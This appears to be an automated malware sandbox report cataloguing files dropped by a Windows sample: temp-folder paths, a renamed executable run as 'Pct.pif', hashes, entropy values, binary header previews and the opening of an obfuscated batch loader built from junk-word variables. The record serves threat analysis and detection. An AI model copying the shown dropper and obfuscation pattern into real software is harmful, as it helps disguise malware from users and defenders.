                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):80880
                                                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\627982\K

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):472416
                                                                                                                                                Entropy (8bit):7.999607227422848
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:Gh6ZVXoC62sxP9IJiuB1AaFZwMGTKBLbg2pkXT:6e9m2sx1ItB1AaFZMUHZkXT
                                                                                                                                                MD5:696AD7D88B44350EF88EBF0E0E5CA682
                                                                                                                                                SHA1:EF850E5DAAAC7A662A4CB805EB54F36685CD0F69
                                                                                                                                                SHA-256:71FE9882CA6750051834CF7DEDDDF409E9D8AC371885581BC055825BA21AF9FB
                                                                                                                                                SHA-512:7FA8FE6CC1163F7B3AB9F6923F0A9E2FF4CE648F7B23F3494804F16DB5785B5187D7BAEDE4B445B076562D7B17325BBF3E326480ABF0EDD1B750A6423E780B1D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.."LBS&....*kg.H..t..k.B..,H.....-......Zm.H..#o...d...&..o.f.9./.....0...$.....@.(9....w.x.r.@b.Kr.........e..(o..$E..g.nQ...daq.Q..S........iI.J.t.....w.......JQ.7.$g....||.}......9...H.`..c...1.EP....C..{.j......O........]...KqP...[cW#{.x5..&.....H3....Z...V..L.........Sb..k.i..xpas...f.[.....].x.>...+sX...{.i..\-$.Z...J..b..u'.QB..H(D%].../.}/.z.e.!..j...Z.Sn.~........j..2.]~........s].X..z......y..#.;.Mj...~,.M.....U.2...|...v:....9&.'[..M......\-cDH.\...Q...61..Z.|b....f..1.#.......T.5.I.[..#.`Y...K.!.....xh..x7E@.'3`....=.e..F..+U..5G.tk.G...^.1.8..A...Z..!/.M.dFr...`...>/......j...w....q....!.EQ.L`.NSI..z.....).b.h.....+n.....vd..P.c...od....\....z....2g.:.I....t.a..3uS..4..a.C.k.(...F.!...i>.....W.Gk....ZR.m0.-.....P...;...y.%.u..Y..\.i.|.9pV....k.........N}.+.......).T..3y..#.q..~#.i..f.~Dc...B.z...[.m.?]BZ.I..U..V.. ....A......}[..X..qJ...4.h[.....s.@,.u.'y<S...3.Z.g..s.O{gn....To..............y..;7..+.....+...

                                                                                                                                                C:\Users\user\AppData\Local\Temp\627982\Pct.pif

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):893608
                                                                                                                                                Entropy (8bit):6.62028134425878
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                                                                MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                                                                SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                                                                SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\Cake

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):888455
                                                                                                                                                Entropy (8bit):6.62230424048634
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:qV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:4xz1JMyyzlohMf1tN70aw8501
                                                                                                                                                MD5:8A424EBFCDF0E786BEC6DB8B03606CD7
                                                                                                                                                SHA1:C4FAB76783EE29FB065A0613DBA20D3ED3D9E355
                                                                                                                                                SHA-256:96119D07B1DFC065664AD215B53E2369C50CFE5A5462A3546146800414A4B9D1
                                                                                                                                                SHA-512:39D02DF34F1D3B79FED89B0DD2D0355AEFC082444FC2E1072C73371979470B39C42AF075C25D619A47D04B704F1D9305C43B6DCEFA155520FFB4D2FB8FFBDD26
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.h....f......f......f...........U.3.Y.x..x........p..8........t.99u1.........f......_^[].$...........J......O...2......U..E.VW3........F.98u[.F..E.=......%....~..E...7.......t..E..D...E..D...G._.F.^]....}..t..M.......}..t.M........0.U..M..E......P.....uaSVW.}.3.S.5.xL..u,.7.u(.u$.u .u.Q.u..u.P.. .I.....t$8]4t.Sj.....I.Pj0V....I.9..........._..^[].0.%.....U...8SV.u.W.~:...m....].........E.E.P.6..4.I..M.E.VD.~H.M..E..U..}.....d.......s............}....E.P.3....I..E.M.+..U.E.E.+.E.E.P.6.U..M...p.I..}....E..u.M..}.f..........E...}.f.......E...E...}.f.......E...E...}.f......f..............t(.E.f.........u..........E..+...;............t'.E.f........`u..........E..+...;........U......................... ..R.....@..U..._^[..]....}.f.FX.......f......f.F\f......t_f.F`f......f.Fdf.......E.P.7..4.I....9^Xt=9^\tE.E.P.7....I.9^`......9^d...............{.......}..t..f.E.f.......f.E.f.......U..wL..M..........E....t..AX.E....t..A\.E...~..A`.E...~..Ad]...U..Q..xL.V.u.Wj...

                                                                                                                                                C:\Users\user\AppData\Local\Temp\Dis

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5182
                                                                                                                                                Entropy (8bit):6.063537788124534
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:hIxgUzr4tgOwVAfBzDICS09CAi6R7u+IhsObfS+NsPvj6ooxdofjxF:hyHAeOqAFDw09CV/2nPvj6DdMF
                                                                                                                                                MD5:7142D5CD1A425F7C37C03DCE9183F22B
                                                                                                                                                SHA1:54D5ABBF6F17F86F038F386FD13BF389DEC5803F
                                                                                                                                                SHA-256:34557DF6D202B678008EB559908284EFAFF2127EA572B5F08B51F58056FF8588
                                                                                                                                                SHA-512:F42EFCC832F0318C4D00E0C0FC53EB5828CE5219974E635AE964CF45258575204DF81D0066B69CC014C509B0B525AE7E501C921872AA60A42F6162EA0CE993A8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:VoipBiographiesScholarPorno..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B...................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\Involve

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):65536
                                                                                                                                                Entropy (8bit):7.996674529659049
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:1536:9EoWdM3bPWntC2OmHkA847qkqxpUmixpAZh3a5YUVTb:yoOmbHilt7Rh83a5Hb
                                                                                                                                                MD5:92A66BA109ED8BC5C8DC3C52D28A2B21
                                                                                                                                                SHA1:CE60AA0AEBE8447E40AD3451DD9778BB6FCEAFBA
                                                                                                                                                SHA-256:E6C2758745FFD82C442B4EC612E91F18AB35B724761CEA33C8BD5F8CC44A5BAF
                                                                                                                                                SHA-512:169214441B68515C54FA3944DAB69E462B0B13085C93E2AC3344CA71B640CC9A32AE894F2D0BE7ED4631F9ED239F2747AEA67778450C85AAC18FC8E28845825F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:AO.T.Dj)..I..i5mL...*.u.6Dh....v6.D?z.K...^.....6\..G.._p0o.m.m.#V..n....&.j.zI... .5...H.=ZrI......i.."..Q..c.........CpH7kn...'...D...)+.. ....$8.E..'.,E..<'P.'..<.....~..t\x.Xo..WZb.$.x.C..l...!..`N..vmX@iU..5.....6..}.y.......T$......`V4gw./..........=p>..O...ba..t-.U.=4(../ET).t....lT._L[4J..'jN16.[...].9l..%.P..c..$~K.k....G..0.a.}.? .N@.Jz.......'.hp}B'$R..M.d.........b.J.'.;.v.Hy^W ...E.......}...c;ial.m.i....oV..*.hZc..Kte.Z....k.....d-.o.m+>~..Tz..5...B.....x..&.E...P....Sn..?...x..P.....[,..^..A+..CM..x(.)C....m..r......$=....Hd.D..O.....u..=.b............*(..0.*...{.~jW...s.$..Ic.;.f{HH.@.q.rA...y...a......<.9.n..,T.y"..Qz.v.]......;......._...2...k.4......d"\.....E..f.<.U.X.........4...a......H@i.S+2.E..=p7......&/z..</.9......../:.R..r.DF...l.....1..m......yO3......x..;h7 ..../Jlv,kl.=.G2!K=.k.Lr..ca.M....F.r........i[~.]7b..4.0.d..L.}...`.|\..V...........ip.lNO.F......r18...N.s....p]...C...m........=(......~.q

                                                                                                                                                C:\Users\user\AppData\Local\Temp\Network

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):64512
                                                                                                                                                Entropy (8bit):7.996909980298202
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:1536:Qfa5fpV9wSQ4rD6L7U8nTylkfVhkLLxbbO8OefQH8Ajodil:AaFZwP4rD8D4kfV+LpnpfoIil
                                                                                                                                                MD5:9475F8C459E7947A11059F61CFF05F81
                                                                                                                                                SHA1:11F280E56E6A50D280E5D4B3294AE083658A32C4
                                                                                                                                                SHA-256:DD0923BDB2F46E7DF3A7CE30666E491E85172741E8AFA5CC5171D7F9AA9596EC
                                                                                                                                                SHA-512:3D58FA91EA364C8EDAB439679DF5216BB90571F97E648F7C052D924B38719A8674EBDB63CADE45B11A95EA6773D4C37661BA6F20F6925B05CF4F35F2724B4679
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..p..76.BL.@.V4...L0X.H........`z..=G~H.R2.....9...0G...xp........-:$.93..a;/f.s......9A.....=`.p.,Vl..s....#.....w.*.m.l..c.e.q...d...T..*..e..e..]....B.....LX...q...$F....Q..]..x...\.A.........~..0n"k.f.(....g....7p2.3cu....f'..v.G.."...;C".Wx30.8.........o.....)]%.\..W..At{I....(.A.7..D...~.=S....U.4..5.6.Y..[lK?`s....5......."3..:..N......g>.H.@,..e.s..g[.6.D=..b.P{.(.......v..Xq...P.nY$..U.F.^.....x1..|k.\Z.\.~.qC.8.\/.I.....d.......g.1.C.7tS.........|h..'.ayq3.T.......t.hW.N0..}r.j..Fk.3Ab...!.=.-..k.F.[.d\...9.K..q.c.2....~w.Dm.;?......O..F....a......If....G...~...q.|\. .?.0.3D..........f...3..?QJ..!...Dp.......rG._(..S+....(......y.X.~....,..u..L....lgR7...H8..j.GV......O.cu...;H.....;.ZDe..t:./:....G.SW...>.ML..>......D.u..-...V..\.......GA.....D.CwQ`.,..s...Y.N.#t.l)..h.{..<[.....u..8I.D.....A.z^....+...."..t.)....z.................;.d..B.i.s.G.i...hd..a....>[...I0...{..yr.2.5^s/.......x.4.`.F..2..l3..aA>.tR>[..d....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\Official

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):76800
                                                                                                                                                Entropy (8bit):7.997648591204404
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:1536:b7raNlehdJrRxeJ47Ie4SmsBwLDO6oQ2ImlUN6NQjWN9ya5T5GcL:Klehre2ElVuGOVS6NTvpbVL
                                                                                                                                                MD5:030AF937F950CD13B98A430A736C7251
                                                                                                                                                SHA1:C53E1AC5C940EFD950A08BF9122AD5B454173462
                                                                                                                                                SHA-256:8CCC6DC5EAD8B767D79AC1F39AC6B03A7D8FE6F4A8CAF2349CFE2F3FC18F4F79
                                                                                                                                                SHA-512:F7C93C744EF78E0236108F75969090B8AECC501B579C4CE5BBD8EED63079B6616DAE89DEF6A1820D9EA4C96058FB9B792C16AD03C5BF9BDA375426EEB38BE0E5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:5.}!.C+.?.V.UE)i.D.c8...ns.$.....W..E!.....jXaIj.@.d..t..f..Ol.`bq...Y.".R>.j.E.+uk#.E.'c.,-^5...Y..:.G.....t....`....l..I@.....3a.......y....9.Fz\...._........-G}..,....b+71{...7.D.N..Y..zP..F5$...C.......?.../....5g^....[G8+*`.7]b.U..U.....AVjK..I..&.......#q.qe..c...0kc....,...yB.b.....|B...9..%qiO.....d.#.'...e.-..z(.....)a.....Y.......%QB.C.A.....uB..0..hz`*...s]./......3O...n....c.....h.S....z.s..Y ........Ot...J.,..C....3U.C{P.....p<u.l.......^..9MV.......6..XbY@.;...M...7f.....H.\...2r...._.n.W.bw....'..j.$-..p...VK9.[F....F.xO.H..E".s=..lr.;nv...n6....f....S.......p.7lH..I....*I......Gy4k......&_.Z....[......Vy.a.K..C..I.....7.i[.}m...gT..M`...^s..oD,|...e.....x.k.9..pc...:.>..l.*kj.=Y6...Mul.5...2.=!..0g........>....t.g.e.X.....480L......%%.I$i.}@...F.A.Gg.X...?...O.......X..c....P.)I>'...1.....w&...^8.t.n.s.....=.X.....}.....[../s;..}=..2Ob...d4....p,`NH.a.4...B...%.$......T...%..7r..q.....bc.~J...@=...q.9.AF.:...@...u

                                                                                                                                                C:\Users\user\AppData\Local\Temp\Omissions

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):75776
                                                                                                                                                Entropy (8bit):7.997855074421664
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:1536:FJiueif9pujuk5llE9VRNnxpyqSDaHBu7iBIRAtrs2bHtXR4oGCRYoq:rCyc5llE907D+OktrzZB49CTq
                                                                                                                                                MD5:64EE4EDB7835146B80EA7133CCC654B0
                                                                                                                                                SHA1:AF32C0E784083A8066F91FBF6385D5BB77451656
                                                                                                                                                SHA-256:C616556C14F120457108E081072A0666D83070A54CD773F327E4D8DE22D4C58B
                                                                                                                                                SHA-512:682F3B8A45D6C5442CAD161D1E758033EBB9384773571F19B1541C98ECD8F15BD60409CB3F53AB9DF8A03FBACA78A90E567FD8477CCEB2F4D1485AA6481DE8CA
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.."LBS&....*kg.H..t..k.B..,H.....-......Zm.H..#o...d...&..o.f.9./.....0...$.....@.(9....w.x.r.@b.Kr.........e..(o..$E..g.nQ...daq.Q..S........iI.J.t.....w.......JQ.7.$g....||.}......9...H.`..c...1.EP....C..{.j......O........]...KqP...[cW#{.x5..&.....H3....Z...V..L.........Sb..k.i..xpas...f.[.....].x.>...+sX...{.i..\-$.Z...J..b..u'.QB..H(D%].../.}/.z.e.!..j...Z.Sn.~........j..2.]~........s].X..z......y..#.;.Mj...~,.M.....U.2...|...v:....9&.'[..M......\-cDH.\...Q...61..Z.|b....f..1.#.......T.5.I.[..#.`Y...K.!.....xh..x7E@.'3`....=.e..F..+U..5G.tk.G...^.1.8..A...Z..!/.M.dFr...`...>/......j...w....q....!.EQ.L`.NSI..z.....).b.h.....+n.....vd..P.c...od....\....z....2g.:.I....t.a..3uS..4..a.C.k.(...F.!...i>.....W.Gk....ZR.m0.-.....P...;...y.%.u..Y..\.i.|.9pV....k.........N}.+.......).T..3y..#.q..~#.i..f.~Dc...B.z...[.m.?]BZ.I..U..V.. ....A......}[..X..qJ...4.h[.....s.@,.u.'y<S...3.Z.g..s.O{gn....To..............y..;7..+.....+...

                                                                                                                                                C:\Users\user\AppData\Local\Temp\Relates

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16736
                                                                                                                                                Entropy (8bit):7.987793680789323
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:xvlN+BSK2m3aAXxIrVB5TUiAWbqO/Ae5ifElKyIAiY7Oj2vGDML:xHRK250oYO/Ae5iluvBL
                                                                                                                                                MD5:469AC2126E73F519CA352BC9C67CBF1B
                                                                                                                                                SHA1:C8DA5EF4EE5574A38004D0EB0E2AA8F156B6EB5A
                                                                                                                                                SHA-256:9371A94749266F130A49D430FD1833FBE0B48C7B67102E6BFEB718CDBE7BD5D6
                                                                                                                                                SHA-512:3073B91DB996F2C1B4E1A45336A42ED8DC379CE5D190D44282A05CF6D595CC99A36CA755EA305C00DFF17B0D28FD29BD9DC4726ACAB708D91E3EC19572DA2851
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:....~.c..f.[U."..G.. .3.q.z......2.{.....I..}B......&gK.Rt.X\u.f<0..J.%.n.9pi...5..G(....Xd..e... .Fn2.c-......kp.=..S....MV.?.....+.~w..B.........'.).H..F*b...!.;m.*.%%{.e.f.3t.b..$.....$x..$....Z......N......WKj@..w........a......G......k8Y...;VF.-..i.^.A..........0.3&......AO.. a.?M._s..No..+v.....o....s...C.<.D...:Fym.a5....`._.4..o,..........?..c.5.l..`Nh..r.<....!.+t.5.m.9.r.....;)...F..agKy...~..|K..e...^$j....7.}p..*.k.Q..$}..<..{]..........$MM.(.....!.C..R...4....RJ..;......5]..e.w....{i...o......B..7]B.~*.Q..$....GE..{Tjc....[..@..o..L.f@.v..u.~:..0q.r.._......Nz.s...}....M.q.K....oe..A.B..P%.@.".Y.-...s5t.z. J....X.w......*..s}.ar5..SJmb..J.....b.^...(.W...n,[M..4..cmv.L..Mu`.....c)u.....Kg.r..S5q.h..M.=E./.../-@...S.....F.5..M.{..rw..n)I&~..h....P.."j..........oZX..U...?Mm...v.l.J^..../.ac..V.]...j....'f.0G..F...L.?.:Y..s`..Z.....:cY.XOX\4.$J....9...<`.f....g.A.~6.O.O.6. 2..&.R.. .L+:.i....82.#9..`>Y.v .Us.q._(.,U.M.2.......

                                                                                                                                                C:\Users\user\AppData\Local\Temp\Retro

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):97280
                                                                                                                                                Entropy (8bit):7.997844451179822
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:1536:4fmINHuxLKsU+OW32SWi4vJn5qBvfESESy/mypzIGPOo4g8Uc8m1sHaZDpeOfq74:cHIVU+ONSCK156DxP/gUc83a7eOILJ12
                                                                                                                                                MD5:B9E95EF2546F5EDF65C3236B91A38A4F
                                                                                                                                                SHA1:0F306C154254B6247264DE35191E5F5BD2EC83F6
                                                                                                                                                SHA-256:8C5755245D1C6CF9C817C749987AB5F8A96D65B04130359DC5275AA42C290C2F
                                                                                                                                                SHA-512:F7B6B3D69C0F6D97CF50D4059A21CF1B6085DDDCAAE5D54A32C6A5DD835BDBF5B80094528FBDF7CB67F9676AA8D24DC02CBB3FFDE197B8DC8474BE79C4177A92
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.&.VZ.......&.`..t......5.w.....[.....0.MJ...p..`.3......:<}.....G>..oh....u*..<..H..0J..ykD..]..3....BG.be....Isg..ni.b....r,.........VC0.dk......o...lX...0....a..=.C...;.....B...Mf..........[.m...x'..r.... .),...*).X..,.>.......i..`)U......P.*..z.74.{."...p....,.l..~..}..v..A.:Vfas .._.@.*....k..v\B..k?.s..@.]..T..)....a......j~'+..oJ.~..7.e..O%,.J|8.Q"....f......Z....,~....q.w..k...EU!K%.HO.........G.H....;.....F..|!.'[..[..>...jup.:.f8.%I.@ 0...~aB.t^#.q7p....I'....?......P...e.L..J#t.y.P..I...(@..V?..-.w....~kW.a...C^.'.kG...........g.5..e.....l.?.%.......X.]bH+..)..]X6.........O.I..r........2T...e...b|...F(...m.L..;..1......Iy...]..J[...|z:.me|J.d.A..H.S....,.....&..........W?._}.Hg.....Q..4...?......... ..J...qy.5#...Y.8.Ec..%<u....9XX..-.*.r..a.....].5.1.)Z...].b..o.9V].t)..../....Z...@..k.S/k.<[..L.`Z..-B...i.T.e.e......<..F^.............W....Hc.-.,:.L..iU..#.%oWv.t.D.....F&mn..].....w..q...g..t.3o...i.s..M..@......(

                                                                                                                                                C:\Users\user\AppData\Local\Temp\Tag

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                File Type:ASCII text, with very long lines (1396), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):27094
                                                                                                                                                Entropy (8bit):5.09705479193114
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:g0rSU8Kvsv+gvIrCCU8U6yp/6zGKPdRFK7swl8CwaQ0A5Z9yo:NrSU8qsv7IrfU6y4JfJ3VkAhyo
                                                                                                                                                MD5:8958FC5BF20604C9166C534E289C369E
                                                                                                                                                SHA1:4207D320225E54971C029C382FA42798D08075E0
                                                                                                                                                SHA-256:299F7A0FA8CC29A54DC71704208B752B2AE7CB71BA06F0E95378F1350198BE66
                                                                                                                                                SHA-512:72B15E975098A1495C765C8ADD2D6969A4DDC54CF77E82CC5F0BAC4303311C6AA3817451019E14BE10BA150E20EF93528786A3953E3A8846CA9D280E0D5F5299
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:Set Reel=O..qUIStation-Administrator-Irish-Nominations-..xZZdMorgan-Surge-Operational-Existing-..EyoAdded-Investigate-Police-Thickness-Shakira-Butter-Inquire-Two-..nTGvProviders-Cottage-Stronger-Fast-..KQdBExit-Ellis-Fed-Adware-Exchanges-Emerald-Sonic-..SeICoalition-Bt-Picture-Joel-Debt-Interstate-Chamber-Leu-Informational-..omVyDisabled-Hardcover-Insulin-Ambient-Pressing-..Set Everything=s..AkTWCoordinate-Cartoons-Helped-Bool-Shorter-Decision-Needle-..TXEthernet-Realty-Locked-Journal-..MXRoute-Distributor-..zBmPPose-Ati-Earning-Unsubscribe-Y-Ball-V-..rIFeeling-Shit-Intent-..EhahEnter-Integrate-Suites-Rug-Discrete-Plain-Clips-Invoice-..NUAffects-Ln-Traditions-Blowjob-New-Admin-..jOfFraser-Leaders-Oasis-Group-..gdChile-Dealing-..cklAExplain-Told-Jeans-Two-Excerpt-Rico-Olympics-..Set Signals=C..fMOGrams-Bhutan-..nuwOf-Worried-Collection-Res-Parliament-..coReasonably-Bride-Upc-Translator-..olHelped-Seo-Casa-Saturday-Myself-Thermal-Tomatoes-..ZMfQDave-..Set Policies=1..smoFake-Idle-Recomme

                                                                                                                                                C:\Users\user\AppData\Local\Temp\Tag.bat (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                File Type:ASCII text, with very long lines (1396), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):27094
                                                                                                                                                Entropy (8bit):5.09705479193114
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:g0rSU8Kvsv+gvIrCCU8U6yp/6zGKPdRFK7swl8CwaQ0A5Z9yo:NrSU8qsv7IrfU6y4JfJ3VkAhyo
                                                                                                                                                MD5:8958FC5BF20604C9166C534E289C369E
                                                                                                                                                SHA1:4207D320225E54971C029C382FA42798D08075E0
                                                                                                                                                SHA-256:299F7A0FA8CC29A54DC71704208B752B2AE7CB71BA06F0E95378F1350198BE66
                                                                                                                                                SHA-512:72B15E975098A1495C765C8ADD2D6969A4DDC54CF77E82CC5F0BAC4303311C6AA3817451019E14BE10BA150E20EF93528786A3953E3A8846CA9D280E0D5F5299
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:Set Reel=O..qUIStation-Administrator-Irish-Nominations-..xZZdMorgan-Surge-Operational-Existing-..EyoAdded-Investigate-Police-Thickness-Shakira-Butter-Inquire-Two-..nTGvProviders-Cottage-Stronger-Fast-..KQdBExit-Ellis-Fed-Adware-Exchanges-Emerald-Sonic-..SeICoalition-Bt-Picture-Joel-Debt-Interstate-Chamber-Leu-Informational-..omVyDisabled-Hardcover-Insulin-Ambient-Pressing-..Set Everything=s..AkTWCoordinate-Cartoons-Helped-Bool-Shorter-Decision-Needle-..TXEthernet-Realty-Locked-Journal-..MXRoute-Distributor-..zBmPPose-Ati-Earning-Unsubscribe-Y-Ball-V-..rIFeeling-Shit-Intent-..EhahEnter-Integrate-Suites-Rug-Discrete-Plain-Clips-Invoice-..NUAffects-Ln-Traditions-Blowjob-New-Admin-..jOfFraser-Leaders-Oasis-Group-..gdChile-Dealing-..cklAExplain-Told-Jeans-Two-Excerpt-Rico-Olympics-..Set Signals=C..fMOGrams-Bhutan-..nuwOf-Worried-Collection-Res-Parliament-..coReasonably-Bride-Upc-Translator-..olHelped-Seo-Casa-Saturday-Myself-Thermal-Tomatoes-..ZMfQDave-..Set Policies=1..smoFake-Idle-Recomme

                                                                                                                                                C:\Users\user\AppData\Local\Temp\Unlike

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):75776
                                                                                                                                                Entropy (8bit):7.99753726843171
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:1536:s/6bgiJIgMNIuau34PQrOdjMe8a84ju5lqAx7Yk/yD1C/eb:sSdeau3nrZep84jMqAx7nY1C2b
                                                                                                                                                MD5:2E99B937C6A64EC595D2962838A879CC
                                                                                                                                                SHA1:6E93F8BCFFEC114FD91E91497BEF63AB64E63941
                                                                                                                                                SHA-256:F15866AFB43398B271C7885B281CE4BD778C9FB081CF9C363F2B0A74652C9CC1
                                                                                                                                                SHA-512:D12F37EE47AFAFF8A49F3EFCA1CCD31043195D36819451CC030CECCD4EBCEC08D73F5EE24E551A6D1C3D97608CE4B75509049568D59BAED5804030F26F4E6055
                                                                                                                                                Malicious:false
